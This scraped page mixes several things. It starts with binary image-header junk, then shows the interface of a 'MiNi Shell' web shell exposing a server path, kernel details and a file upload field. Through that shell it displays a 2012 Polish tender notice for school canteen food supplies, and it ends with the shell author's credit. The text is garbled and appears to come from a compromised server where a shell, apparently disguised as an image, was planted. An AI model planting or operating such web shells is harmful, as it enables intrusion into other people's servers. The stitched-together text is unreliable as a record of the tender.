JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121218/516070-N-2012.html

<p class="kh_header"><b>Wleń: Zakup i  dostawa artykułów żywnościowych w pakietach do stołówki szkolnej       Zespołu Szkół im. Św. Jadwigi Śląskiej we Wleniu.</b><br>
<b>Numer ogłoszenia: 516070 - 2012; data zamieszczenia: 18.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. św. Jadwigi Śląskiej , ul. Dworcowa 10, 59-610 Wleń, woj. dolnośląskie, tel. 0-75 713 63 69, faks 0-75 713 63 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zswlen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i  dostawa artykułów żywnościowych w pakietach do stołówki szkolnej       Zespołu Szkół im. Św. Jadwigi Śląskiej we Wleniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa  żywności do stołówki szkolnej:
	Pakiet I -  Artykuły spożywcze, przyprawy, makarony, 
	Szczegółowy opis zamówienia zawiera załącznik Nr 2A
	Pakiet II -  Warzywa i owoce, warzywa przetworzone,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2B 
	Pakiet III - Tłuszcze, sery, mleko, śmietana,   
	Szczegółowy opis zamówienia zawiera załącznik Nr 2C 
	Pakiet IV  - Mięso drobiowe, 
	Szczegółowy opis zamówienia zawiera załącznik  Nr 2D 
	Pakiet V - Mrożonki , ryby i przetwory z ryb,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2E 
	Pakiet VI - Mięso  wieprzowe, wołowe, wyroby wędliniarskie,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2F
	Pakiet VII - pieczywo   
	Szczegółowy opis zamówienia zawiera załącznik Nr 2G.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-6, 15.30.00.00-1, 15.50.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.60.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Każdy wykonawca może złożyć jedną ofertę w formie pisemnej .
2.Oferta powinna być sporządzona w języku polskim na załączonych do specyfikacji formularzach . 
3.Do oferty winny być dołączone wszystkie dokumenty wymienione w pkt III.3. niniejszej Specyfikacji.
1.4.	W przypadku, dołączenia do oferty kopii dokumentu, powyższa kopia winna być potwierdzona za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną  przez wykonawcę do zaciągania w jego imieniu zobowiązań.
4.Wszystkie załączniki do oferty, stanowiące oświadczenia wykonawcy winny być podpisane przez upoważnionego przedstawiciela wykonawcy. Upoważnienie do podpisania oferty winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez wykonawcę.
1.6.	Treść oferty musi odpowiadać treści  Specyfikacji Istotnych Warunków Zamówienia. 
5.Złożone oferty winny być zgodne z wymaganiami SIWZ.
6. Zaleca się aby wszystkie strony oferty były  p o n u m e r o w a n e   kolejnymi numerami,  a  wszystkie miejsca w których wykonawca naniósł zmiany winny być parafowane przez osobę podpisującą ofertę.
	
7. Zaleca się, aby Wykonawca umieścił ofertę w  kopercie  i oznaczył w następujący sposób.
8.	Oferta w sprawie przetargu nieograniczonego na:
          Zakup i  dostawa artykułów żywnościowych w pakietach do stołówki szkolnej               
           Zespołu Szkół im. Św. Jadwigi Śląskiej we Wleniu.
 Koperta , musi być opisana nazwą i adresem Wykonawcy.
	 W przypadku nieprawidłowego zaadresowania lub zamknięcia koperty zamawiający nie bierze odpowiedzialności za złe skierowanie przesyłki i jej przedterminowe otwarcie. Oferty złożone po terminie zostaną zwrócone Wykonawcy bez otwierania po upływie terminu przewidzianego na wniesienie protestu (zgodnie z Art. 84  ust. 2 ustawy).
	
Po upływie terminu składania ofert, Wykonawca nie może wycofać oferty i wprowadzić w niej zmian (art.84,ust.1 ustawy).

1.11. W przypadku   wprowadzenia  zmiany  do  złożonej  oferty  lub wycofania złożonej oferty, koperty  zawierające zmiany lub informacje o wycofaniu należy  oznaczyć w sposób podany  w pkt 1.9.1. z dopiskiem na kopercie  odpowiednio ZMIANA OFERTY , lub WYCOFANIE  OFERTY.
        Nie otwierać przed dniem  17 stycznia 2013r. godz. 10,00.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wykonawcy, składający ważną i odpowiednią ofertę, którzy spełniają  następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia;
c) znajdują się w sytuacji   ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
  d) nie podlegają wykluczeniu z postępowania o  udzielenie zamówienia.   
ponadto:
-	zadeklarują wykonywanie dostawy  w sposób ciągły  zapewniający utrzymanie  dziennego zapasu,
-	posiadają  środek transportu przystosowany do przewozu żywności,	
-	akceptują warunki projektu umowy,
-	akceptują warunki zawarte w niniejszej specyfikacji.
Oferta zostanie odrzucona bez rozpatrywania gdy:
-	jest  niezgodna z ustawą ,
-	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,           z zastrzeżeniem art.87 ust.2 pkt.3
-	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                o zwalczaniu nieuczciwej konkurencji;
-	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
-	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu              o udzielenie zamówienia ;
-	zawiera błędy w obliczeniu  ceny;
-	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził   się na poprawienie omyłki  o której mowa w art.87 ust.2 pkt.3
-	jest nieważna na podstawie odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-posiadają  środek transportu przystosowany do przewozu żywności,
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia;
b) znajdują się w sytuacji   ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.1. Wypełniony formularz oferty wg załącznika nr 1 do SIWZ.
Wykonawca winien wypełnić odpowiednie załączniki formularze cenowe zał. Nr 2A - 2G wg pakietów w zależności na które zadania składa ofertę.
3.2. Wypełniony arkusz kalkulacyjny wg załącznika nr 3
3.3 Aktualny odpis z  właściwego  rejestru albo aktualnego zaświadczenia o wpisie do  ewidencji działalności gospodarczej  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.5. Zamawiający żąda przedłożenia następujących dokumentów, potwierdzających spełnienie warunków określonych w art.22 ustawy prawo zamówień publicznych:
a)	Oświadczenie o spełnieniu warunków określonych w art. 22 ustawy prawo zamówień publicznych oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - na formularzu stanowiącym  załącznik nr 4 do SIWZ 
3.6.  Zaakceptowany  projekt umowy załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zswlen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Św. Jadwigi Śląskiej
we Wleniu ul. Dworcowa 10 pokój nr 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2013 godzina 10:00, miejsce: Ofertę należy złożyć w zamkniętej kopercie w siedzibie zamawiającego we Wleniu , przy ul. Dworcowej 10, pok. 109 ,nie później niż dnia 17 stycznia 2013r.  do  godz. 10,00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE - PRZYPRAWY, MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Herbata czarna 100g	szt.	130
Kawa zbożowa	szt.	60
Cukier biały kryształ	kg	650
Kasza jęczmienna 500g	szt.	110
Kasza manna 0,5kg	szt.	40
Płatki śniadaniowe(400g) kukurydziane	szt.	50
Płatki  śniadaniowe czekoladowe 400g	szt.	300
Ryż	kg	120
Mąka pszenna	kg	 210
Mąka ziemniaczana	kg	60
Zacierka	szt.	100
Dżem	szt.	100
Zupa w proszku Winiary             
( wg. wyboru.)	szt.	250
Groszek konserwowy 400g	szt.	80
Marchew z groszkiem 500g	szt.	150
Fasola konserowa 400g	szt.	25
Sosy do mięsa Winiary	szt.	80
Sosy do sałatek 	szt.	20
Koncentrat pomidorowy 180g	szt.	190
Sól	kg	110
Warzywko	szt.	120
Kucharek 0,20kg	szt.	110
Pieprz naturalny 20g	szt.	300
Przyprawa w płynie Magii 1litr	szt.	20
Majeranek suszony 10g	szt.	10
Koper suszony 10g	szt.	30
Pietruszka suszona 10g	szt.	80
Liść laurowy	szt.	40
Musztarda 180g stołowa	szt.	50
Keczup Pudliszki 500g	szt.	90
Rosołki w kostce Winiary	szt.	200
Makaron           świderki,
                       łazanka,
                        wstążki
                        nitki	kg
kg
kg
kg	170
120
130
180
Cukier puder 500g	szt.	30
Cukier waniliowy 20g	szt.	150
Ocet 0,5 l	szt.	40
Papryka słodka proszek	szt.	40
Ziele angielskie	szt.	40
Proszek do pieczenia	szt.	30
Pasztet drobiowy Prochowicki	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WARZYWA I OWOCE ,WARZYWA PRZETWORZONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki	kg	5200			
Marchewka	kg	260			
Pietruszka	kg	180			
Seler	kg	110			
Cebula	kg	130			
Pora	kg	  140			
Szczypiorek	pęcz.	20			
Pietruszka natka	pęcz.	30			
Koperek	pęcz.	30			
Kapusta biała	kg	270			
Kapusta czerwona	kg	80			
Kapusta pekińska 
 Kapusta włoska	kg
kg	150
150			
Ogórki zielone	kg	100			
Pieczarki	kg	70			
Burak czerwony	kg	400			
Rzodkiewka	pęcz.	70			
Groch połówki 400g	szt.	70			
Fasola (puszka)	kg	80			
Pomidor	kg	140			
Sałata zielona	szt.	50			
Papryka świeża	kg	50			

Kalafior	szt.	70			
Ogórki konserwowe 900g	szt.	250			
Papryka konserwowa 950 g	szt.	40			
Kapusta czerwona konserwowa 900 g 	szt.	40			
Kapusta kiszona	kg	210			
Przecier ogórkowy 300 g	szt.	80			
Szczaw w słoikach 300 g	szt.	50			
Cytryna	kg	15			
Jabłka	kg	200			
Banany	kg	360			
Mandarynki	kg	170			
Syrop zaprawa do napoi 500g 
Herbapol	szt.	700			
Jajka	szt.	3500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TŁUSZCZE ,SERY,MLEKO,ŚMIETANA,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna smakowita	kg	140
Margaryna mleczna 250g	kg	130
Olej uniwersalny 1l	litr	170
Ser biały półtłusty	kg	150
Ser topiony  100g	szt.	250
Ser żółty Gouda	kg	 70
Mleko 2% folia	litr	1000
Śmietana 18%	szt.	200
Śmietana 30% 200g	szt.	580
Jogurt kubek 150g	szt.	3200
Majonez 400g	szt.	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO DROBIOWE (wędliny i wyroby wędliniarskie drobiowe).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ćwiartka  z kurczaka	kg	900
Udka z kurczaka	kg	200
Kurczak	kg	60
Porcje rosołowe	kg	220
Wątróbka z kurczaka	kg	20
Piersi z kurczaka	kg	90
Kiełbasy drobiowe polędwica	kg	  40
Pasztet drobiowy w bloku	kg	5
Mięso mielone z indyka	kg	290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI , RYBY I PRZETWORY Z RYB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zupy mrożonki	kg	170
Paprykarz (konserw 300g)	szt.	60
Filet  mrożony  paluszki panierowane	kg	50
Filet morszczuk mrozony	kg	60
Śledź matjas	kg	20
Makrela w oleju (konserwa)	szt.	70
Makrela w pomidorach	szt.	50
Śledź w pomidorach	szt.	100
Pierogi ruskie	kg	200
Fasolka pop bretońsku	kg	50
Uszka z kapusta i grzybami	kg	30
Flaki blanszowane	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO WIEPRZOWE ( wędliny , przetwory wieprzowe).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości	kg	420
Żeberka	kg	30
Karczek b/k	kg	50
Karczek z kością	kg	50
Łopatka wieprzowa	kg	200
Mięso gulaszowe	kg	50
Szynka b/k	kg	50
Szynka wędzona	kg	80
Szynka konserwowa	kg	30
Boczek wędzony	kg	40
Kiełbasa podsuszana 
(równorzędne żywieckiej)	kg	50
Kiełbasa grilowa	kg	60
Kiełbasa parówkowa	kg	190
Kiełbasa śląska	kg	50
Polędwica sopocka	kg	10
Ogonówka	kg	10
 Mięso mielone 400g	szt.	850
Słonina	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb krojony 600 g	szt.	1000
Bułka pszenna zwykła 100g	szt.	2500
Bułka tarta zwykła 0,5kg	szt.	160
Bułka wrocławska	szt.	150
Chleb tostowy	szt.	320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com